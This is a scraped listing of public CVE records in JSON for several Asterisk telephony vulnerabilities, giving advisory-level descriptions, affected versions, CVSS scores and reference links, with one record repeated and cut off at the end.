res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |
|---|---|---|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T05:17:42.455Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-46837",
"datePublished": "2022-08-30T00:00:00",
"dateReserved": "2022-08-30T00:00:00",
"dateUpdated": "2024-08-04T05:17:42.455Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26498 (GCVE-0-2022-26498)
Vulnerability from cvelistv5 – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03
VLAI?
Summary
An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:03:32.984Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-04T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
},
{
"url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26498",
"datePublished": "2022-04-15T00:00:00",
"dateReserved": "2022-03-06T00:00:00",
"dateUpdated": "2024-08-03T05:03:32.984Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26651 (GCVE-0-2022-26651)
Vulnerability from cvelistv5 – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:11
VLAI?
Summary
An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:11:43.391Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
},
{
"url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26651",
"datePublished": "2022-04-15T00:00:00",
"dateReserved": "2022-03-07T00:00:00",
"dateUpdated": "2024-08-03T05:11:43.391Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26499 (GCVE-0-2022-26499)
Vulnerability from cvelistv5 – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03
VLAI?
Summary
An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it's possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:03:32.912Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it\u0027s possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
},
{
"url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26499",
"datePublished": "2022-04-15T00:00:00",
"dateReserved": "2022-03-06T00:00:00",
"dateUpdated": "2024-08-03T05:03:32.912Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-49786 (GCVE-0-2023-49786)
Vulnerability from nvd – Published: 2023-12-14 19:47 – Updated: 2025-02-13 17:18
VLAI?
Summary
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6.
Severity ?
7.5 (High)
CWE
- CWE-703 - Improper Check or Handling of Exceptional Conditions
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:01:25.997Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
},
{
"name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2023/Dec/24"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-49786",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-08T14:19:55.907894Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-08T14:20:19.222Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c 18.20.1"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c 20.5.1"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c 18.9-cert6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-703",
"description": "CWE-703: Improper Check or Handling of Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:18.647Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
},
{
"name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
},
{
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
},
{
"url": "http://seclists.org/fulldisclosure/2023/Dec/24"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-hxj9-xwr8-w8pq",
"discovery": "UNKNOWN"
},
"title": "Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-49786",
"datePublished": "2023-12-14T19:47:46.306Z",
"dateReserved": "2023-11-30T13:39:50.862Z",
"dateUpdated": "2025-02-13T17:18:55.224Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-37457 (GCVE-0-2023-37457)
Vulnerability from nvd – Published: 2023-12-14 19:43 – Updated: 2025-02-13 17:01
VLAI?
Summary
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa.
Severity ?
7.5 (High)
CWE
- CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T17:16:30.273Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
},
{
"name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c= 18.20.0"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c= 20.5.0"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c= 18.9-cert5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120: Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:20.393Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
},
{
"name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-98rc-4j27-74hh",
"discovery": "UNKNOWN"
},
"title": "Asterisk\u0027s PJSIP_HEADER dialplan function can overwrite memory/cause crash when using \u0027update\u0027"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-37457",
"datePublished": "2023-12-14T19:43:30.945Z",
"dateReserved": "2023-07-06T13:01:36.996Z",
"dateUpdated": "2025-02-13T17:01:26.636Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-49294 (GCVE-0-2023-49294)
Vulnerability from nvd – Published: 2023-12-14 19:40 – Updated: 2025-02-13 17:18
VLAI?
Summary
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.
Severity ?
4.9 (Medium)
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T21:53:45.375Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
},
{
"name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c 18.20.1"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c 20.5.1"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c 18.9-cert6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:21.896Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
},
{
"name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-8857-hfmw-vg8f",
"discovery": "UNKNOWN"
},
"title": "Asterisk Path Traversal vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-49294",
"datePublished": "2023-12-14T19:40:46.157Z",
"dateReserved": "2023-11-24T16:45:24.314Z",
"dateUpdated": "2025-02-13T17:18:40.277Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-46837 (GCVE-0-2021-46837)
Vulnerability from nvd – Published: 2022-08-30 00:00 – Updated: 2024-08-04 05:17
VLAI?
Summary
res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |
|---|---|---|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T05:17:42.455Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
